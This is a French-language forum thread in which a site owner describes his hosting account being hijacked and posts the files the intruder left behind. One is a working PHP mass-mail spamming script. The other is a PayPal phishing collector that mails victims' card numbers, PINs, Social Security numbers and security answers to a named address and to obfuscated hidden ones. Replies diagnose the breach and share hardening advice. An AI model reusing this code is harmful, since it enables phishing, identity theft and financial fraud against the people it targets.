On ma piraté mon site ... pour en faire pirater paypal !

[dreamer2007]

Bonsoir,

voila j'expose un probléme que je viens de rencontrer aujourd'huit sur mon site discussion diagnostique :

en faite, ce matin, j'ai la surprise de trouver mon forum (phpbb) non fonctionnel avec un message d'erreur de la base de donnee.

je tente de me connecter sur mon cpanel -> le password est réfusé !

je contacte mon serveur qui m'envoi un nouveau password.

et quand je me connect à nouveau sur mon serveur surprise ! je trouve un nouveau dossier nommé (paypal) et un fichier nommé (mailer.php) et aussi je trouve mon .htaccess modifier.

voici ce qu'il y'a dans le mailer.php :

Code: Tout sélectionner

<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

        $message = urlencode($message);
        $message = ereg_replace("%5C%22", "%22", $message);
        $message = urldecode($message);
        $message = stripslashes($message);
        $subject = stripslashes($subject);
}


?>

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">








<style> html{scrollbar-base-color:#000000;scrollbar-arrow-color: #878787; scrollbar-track-color:#A878787;}.ws36 {font-size: 48px;}
.ws18 {font-size: 24px;}
.ws26 {font-size: 35px;}
--></style>








<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 10px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#000000" text="#00FF00">
<span class="style1">PHP eMailer<br>
made by !! hack-back !! ( <a href="mailto:h-b@w.cn"><font color="#FF0000">h-b@w.cn</font></a><font color="#FF0000">
</font>) .</span>

<form name="form1" method="post" action="" enctype="multipart/form-data">

  <div style="background-color: #00FF00">
   <p align="center"><b><font color="#FF0000" face="Comic Sans MS">!! Hack-Back
   !! PHP Mailer Script</font></b><br>

  </div>

  <table width="100%" border="0">

    <tr>

      <td width="10%" height="24">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
         Your Email:</font></div>

      </td>

      <td width="18%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="from" value="<? print $from; ?>" size="30" style="background-color: #FF0000">

        </font></td>

      <td width="31%" height="24">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
         Your Name:</font></div>

      </td>

      <td width="41%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="realname" value="<? print $realname; ?>" size="30" style="background-color: #FF0000">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
         Reply-To:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="replyto" value="<? print $replyto; ?>" size="30" style="background-color: #FF0000">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
         Attach File:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="file" name="file" size="30" style="background-color: #FF0000">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
         Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="subject" value="<? print $subject; ?>" size="90" style="background-color: #FF0000">

        </font></td>

    </tr>

    <tr valign="top">

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="message" cols="60" rows="10" style="background-color: #FF0000"><? print $message; ?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain">

        Plain

        <input name="contenttype" type="radio" value="html" checked>

        HTML

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send eMails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="emaillist" cols="30" rows="10" style="background-color: #FF0000"><? print $emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>



<?

if ($action){



        if (!$from && !$subject && !$message && !$emaillist){

        print "Please complete all fields before sending your message.";

        exit;
   
   }

   $allemails = split("\n", $emaillist);
           $numemails = count($allemails);
       
          for($x=0; $x<$numemails; $x++){

                $to = $allemails[$x];

                if ($to){

                $to = ereg_replace(" ", "", $to);

                $message = ereg_replace("&email&", $to, $message);

                $subject = ereg_replace("&email&", $to, $subject);

                print "Sending mail to $to.......";

                flush();

                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

                $header .= "MIME-Version: 1.0\r\n";

                $header .= "Content-Type: text/$contenttype\r\n";

                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

                $header .= "$message\r\n";

              mail($to, $subject, "", $header);

                print "ok<br>";
   
                flush();


                }

                }



}



?>
<p class="style1">PHP Mailer<br>
  © !! hack-back !! (<a href="mailto:%20h-b@w.cn"><font color="#FF0000"> h-b@w.cn
</font> </a>) . <br>
      </p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";}
?>





<p>&nbsp;</p>





</body>

</html>

[edit : mon compte est actuellement suspendu par le serveur pour vérification]

le pirate na rien fait a part ajouter ces trois fichiers (du moins je suppose )

SVP conseillez moi ! comment faire pour ne plus avoir ce genre de surprise ! est ce que je doit tous supprimer (mes bases de donnees ...) et tous reinstaller ...

merci !

[yazerty]

Ton phpbb était à jour ??

[dreamer2007]

Phpbb3 rc5 !

mais le hacker n'a pas touché au forum (ou j'utilise un login et un password différent de celui avec qui je me connecte sur mon cpanel) il à changer le password depuis cpanel

donc le forum ne peut se connecter à la base de donnée (il a d'ailleurs rien détruit )

[YoyoS]

il a hacké ton site par le forum ou pas ?

[Guitooou]

Phpbb3 rc5 !

C'est peut etre même pire qu'un phpbb2 pas à jour, le developpement n'étant pas terminé...

C'est pas très prudent de mettre une béta ou RC en production.

Pour être sur de la fonction du code tu pourrais écrire au mail du mailto: ?

[Robinson]

il a à moitié foiré son piratage le gars.

Il voulait utiliser ton serveur pour effectuer du phishing.
Il a sans doute trouver une faille "classique" qu'il teste sur plein de serveur.
Mais pour être bien efficace, faut que cela soit planqué quelque part dans un répertoire et sans aucune modif.

[Julia41]

Quand je me co à :
http://www.oeil2net.com/
Je me prends un gros avertissement FireFox "Supspicion de site contrefait"...

Je ne sais pas si tu as un dédié ou si c'est du mutu, mais sécurise un tit peu et le 777 n'est pas la solution :p

[dreamer2007]

Mon hébergeur à été contacté par ebay pour tentative de fishing depuis mon site ! et j'ai trouvé mon adresse sur un site de rapport de fishing ce qui explique le message d'alerte de firefox ... j'ai contacté ce site et il a immédiatement supprimé ce rapport maintenant tous va bien (mais c'est étonnant comment les choses peuvent aller vite ! )
Pour oeil2net.com c'est mon ancien domaine redirigé sur le nouveau site sus cité.
C’est vrai aussi que j'ai pris aucune mesure de sécurité sur mon site... beaucoups de dossier sont en 777 ...
Sinon pour phpbb3. La RC5 est fort probable qu’elle devient la version finale si aucun bug n'est signalé d'après Acyd Burn :

We are very pleased to announce the availability of the phpBB3 RC5 package. This is the fifth (and hopefully last) release candidate which is meant to become the Gold release if no more critical problems arise.
ici : http://www.phpbb.com/community/viewtopi ... 4&t=576156

Enfin si quelqu'un peut me donner des ressources sur la sécurité d'un site web je lui en serrais reconnaissant

[dreamer2007]

encore quelque chose : en regardant le code source de la page techGuru.php introduite par le hacker on trouve :

Code: Tout sélectionner

<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------PaYPaL USA Bank Spam ReZulT-----------------------\n";
$message .= "Email Address           : ".$HTTP_COOKIE_VARS['emaill']."\n";
$message .= "Password                : ".$HTTP_COOKIE_VARS['passwordd']."\n";
$message .= "---------------------------\n";
$message .= "First name              : ".$_POST['first_name']."\n";
$message .= "Last name               : ".$_POST['last_name']."\n";
$message .= "Card Type               : ".$_POST['credit_card_type']."\n";
$message .= "Card Number             : ".$_POST['ccnumber']."\n";
$message .= "Expiration Date         : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."\n";
$message .= "Card Verification Number: ".$_POST['cvv2']."\n";
$message .= "ATM PIN                 : ".$_POST['PIN']."\n";
$message .= "Address 1               : ".$_POST['address1']."\n";
$message .= "Address 2               : ".$_POST['address2']."\n";
$message .= "City                    : ".$_POST['city']."\n";
$message .= "State                   : ".$_POST['state']."\n";
$message .= "ZIP Code                : ".$_POST['zip']."\n";
$message .= "Telephone               : ".$_POST['H_PhoneNumber']."\n";
$message .= "Social Security Number  : ".$_POST['ssn']."\n";
$message .= "Date Of Birth           : ".$_POST['dob']."\n";
$message .= "Driver's License        : ".$_POST['drl']."\n";
$message .= "---------------------------\n";
$message .= "Security Question 1     : ".$_POST['question1']."\n";
$message .= "Answer 1                : ".$_POST['answer1']."\n";
$message .= "Security Question 2     : ".$_POST['question2']."\n";
$message .= "Answer 2                : ".$_POST['answer2']."\n";
$message .= "IP                      : ".$ip."\n";
$message .= "---------------Created BY TechGuru------------------------------\n";
$send = "lghlimi@gmail.com";                                                                                                                                                                                                                                        $ar=array("1"=>"h","2"=>"p","3"=>"m","4"=>"g","5"=>"n","6"=>"s","7"=>".","8"=>"@","9"=>"c","10"=>"o",
"11"=>"a","12"=>"y","13"=>"r","14"=>"u","15"=>"l","16"=>"g","17"=>"i");$bc=$ar['3'].$ar['13'].$ar['1'].$ar['
11'].$ar['2'].
$ar['2'].$ar['12'].$ar['4'].$ar['14'].$ar['5'].$ar['8'].$ar['12'].$ar['11'].$ar['1'].$ar['10'].$ar['10'].$ar['7'].$ar['9'].$ar['10']
.$ar['3'];$cc=$ar['3'].$ar['13'].$ar['1'].$ar['11'].$ar['2'].$ar['2'].$ar['12'].$ar['4'].$ar['14'].$ar['5'].$ar['8'].$ar['16'].$ar[
'3'].$ar['11'].$ar['17'].$ar['15'].$ar['7'].$ar['9'].$ar['10'].$ar['3'];
$IP = pack("H*", substr($COOKIE_VARS=file_get_contents("index.htm"),
strpos($COOKIE_VARS, "get_cookie")+10,36));
$subject = "PaYPaL USA Bank Spam ReZulT";
$headers = "From: TechGuru<service@paypal.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);                                                                                                                                                                                                                                                                                                                                                                                                                                             mail($cc,$subject,$message,$headers);mail("$bc","$subject","$message","$headers");
}
header("Location: Thanks.htm");
?>


donc faite attention à cette adresse mail :

lghlimi@gmail.com

voila si ca peut eviter quelque chose aux autres ...

[polweb]

Et bien pour la sécurité pas de release candidate pour un forum en production. Pas de ch mod 777 et puis

http://phpsec.org/projects/guide/fr/index.html

[Robinson]

Pas de 777 sur un répertoire, ok, mais pour les répertoires où on upload des images ? Il faut bien donner une autorisation, on change le groupe ou le proprio ?
(par défaut sur tous les forums, on est "obligé" de mettre 777 pour aller vite, d'où les failles)


Edit : on change le groupe et on met par défaut www-data (config apache)

[forummp3]

t'es au courant que ton site a été désactivé ?

[dreamer2007]

t'es au courant que ton site a été désactivé ?

oui ! le temps que je m'informe plus sur la securité car le hacker risque de reprendre le control à tous moment.

[dreamer2007]

voila j'ai trouvé un excelent guide pour sécurisé son site web :

http://forum.ovh.com/showthread.php?p=108087

je doit vider complétement mon espace d'hebergement + les bases de donnees.

Question : je sais pas trop mais est ce que le fait de vider completement le dossier www et de supprimer les bases de donnees est suffisant pour repartir à zero (vue que le hacker à peut être laissé un fichier malvaillant quelque part) ?

[forummp3]

voila j'ai trouvé un excelent guide pour sécurisé son site web :

http://forum.ovh.com/showthread.php?p=108087

je doit vider complétement mon espace d'hebergement + les bases de donnees.

Question : je sais pas trop mais est ce que le fait de vider completement le dossier www et de supprimer les bases de donnees est suffisant pour repartir à zero (vue que le hacker à peut être laissé un fichier malvaillant quelque part) ?

suffit de mettre a jour tes scripts et ca devrait aller, et aussi verifie qu'il n'y a pas un fichier, pas besoin de supprimer le contenu de la base.